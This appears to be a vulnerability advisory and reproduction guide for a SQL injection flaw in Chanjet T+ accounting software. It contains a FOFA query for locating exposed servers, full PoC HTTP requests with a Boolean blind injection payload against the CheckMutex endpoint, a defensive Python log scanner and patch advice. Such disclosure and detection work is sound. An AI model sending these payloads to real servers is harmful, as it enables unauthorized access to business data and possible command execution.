Chanjet T+SQL Injection Vulnerability
Disclaimer: Do not use the techniques in this article for illegal testing. Any direct or indirect consequences or losses caused by disseminating or using the information or tools provided in this article are borne by the user; the author bears no responsibility for adverse consequences. This article is for educational purposes only.
1. Product Introduction
Chanjet T+ is an Internet-based enterprise management suite whose modules include financial management, procurement management, inventory management and others. It mainly targets the integrated finance and business needs of small and medium-sized industrial, trading and commercial enterprises, and incorporates social, mobile, Internet of Things, e-commerce and Internet information subscription features.
2. Vulnerability overview
A back-end function of Chanjet T+ only checks the caller's permissions and does not filter user input. Once the permission check is bypassed, this results in a SQL injection vulnerability, which an attacker can ultimately exploit to achieve remote command execution.
3. Affected versions
Chanjet T+ 13.0
Chanjet T+ 16.0
4. Reproduction environment
FOFA: app="Chanjet-TPlus"
5. Vulnerability reproduction
PoC
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
{"accNum": "3'", "functionTag": "SYS0104", "url": ""}
Appending a single quote to the accNum parameter causes a database error, which usually indicates that the parameter is injectable.
Next, construct a Boolean-based blind injection payload:
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
{"accNum": "3' AND 5227 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5227=5227) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(120)+CHAR(113)))-- NCab", "functionTag": "SYS0104", "url": ""}
The payload appends a subquery to the SQL statement and builds a Boolean condition by testing whether 5227 equals 5227. If the condition is true, the CASE expression evaluates SELECT CHAR(49), i.e. it returns the character "1"; otherwise it returns CHAR(48), the character "0".
PS: The decimal numbers inside CHAR() are ASCII code points.
The response contains "1", confirming that the vulnerability exists.
The finding can also be verified with sqlmap.
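As a defensive counterpart to the probe above, here is an added example (not code from the original write-up or from Chanjet) that inspects logged POST requests to the CheckMutex handler and flags accNum values that are not a plain numeric id or that carry the injection indicators visible in the payload (quotes, comment markers, AND/OR, SELECT, CHAR() chains). The numeric accNum format, the log record layout and the sample records are assumptions.

```python
import json
import re
from urllib.parse import parse_qs, urlparse

# Handler and method named in the write-up; the expected accNum format is an assumption.
TARGET_HANDLER = "Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx"
ACCNUM_OK = re.compile(r"\d{1,10}")  # assumption: a legitimate account number is a short numeric id
INJECTION_HINTS = {
    "quote": re.compile(r"'"),
    "comment": re.compile(r"--|/\*"),
    "boolean_operator": re.compile(r"\b(AND|OR)\b", re.IGNORECASE),
    "subquery": re.compile(r"\bSELECT\b", re.IGNORECASE),
    "char_encoding": re.compile(r"CHAR\(\d+\)", re.IGNORECASE),  # CHAR() chains avoid literal quotes
}

def is_checkmutex(url: str) -> bool:
    """True when the request targets the CheckMutex method of the multi-company controller."""
    parsed = urlparse(url)
    method = parse_qs(parsed.query).get("method", [""])[0]
    return parsed.path.endswith(TARGET_HANDLER) and method.lower() == "checkmutex"

def inspect_request(url: str, body: str) -> tuple[str, list[str]]:
    """Classify one POST as 'ignore', 'ok' or 'suspect' and list the matched indicators."""
    if not is_checkmutex(url):
        return "ignore", []
    try:
        acc = str(json.loads(body).get("accNum", ""))
    except (ValueError, AttributeError):
        return "suspect", ["body is not a JSON object"]
    if ACCNUM_OK.fullmatch(acc):
        return "ok", []
    reasons = [name for name, rx in INJECTION_HINTS.items() if rx.search(acc)]
    return "suspect", reasons or ["accNum is not a numeric id"]

def scan(records: list[dict]) -> list[tuple[str, list[str]]]:
    """Return (source address, reasons) for every suspect request in a batch of log records."""
    results = [(r["src"], *inspect_request(r["url"], r["body"])) for r in records]
    return [(src, reasons) for src, verdict, reasons in results if verdict == "suspect"]

# Constructed sample records, not real traffic; logged POST bodies assume a WAF or reverse proxy.
CHECKMUTEX_URL = "/tplus/ajaxpro/" + TARGET_HANDLER + "?method=CheckMutex"
def _body(acc: str) -> str:
    return json.dumps({"accNum": acc, "functionTag": "SYS0104", "url": ""})
SAMPLE_RECORDS = [
    {"src": "10.0.0.5", "url": CHECKMUTEX_URL, "body": _body("3")},
    {"src": "203.0.113.9", "url": CHECKMUTEX_URL, "body": _body("3'")},
    {"src": "203.0.113.9", "url": CHECKMUTEX_URL,
     "body": _body("3' AND 5227 IN (SELECT (CHAR(113)+CHAR(49)))-- NCab")},
    {"src": "10.0.0.7", "url": "/tplus/login.aspx", "body": "{}"},
]
```

Running scan(SAMPLE_RECORDS) yields two alerts for 203.0.113.9, the first matching only the quote indicator and the second matching all five; IIS access logs do not record POST bodies by default, so this check belongs at a WAF or reverse proxy that does.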
6. Remediation
The vendor has released a patch for this issue, and affected users are advised to install it as soon as possible.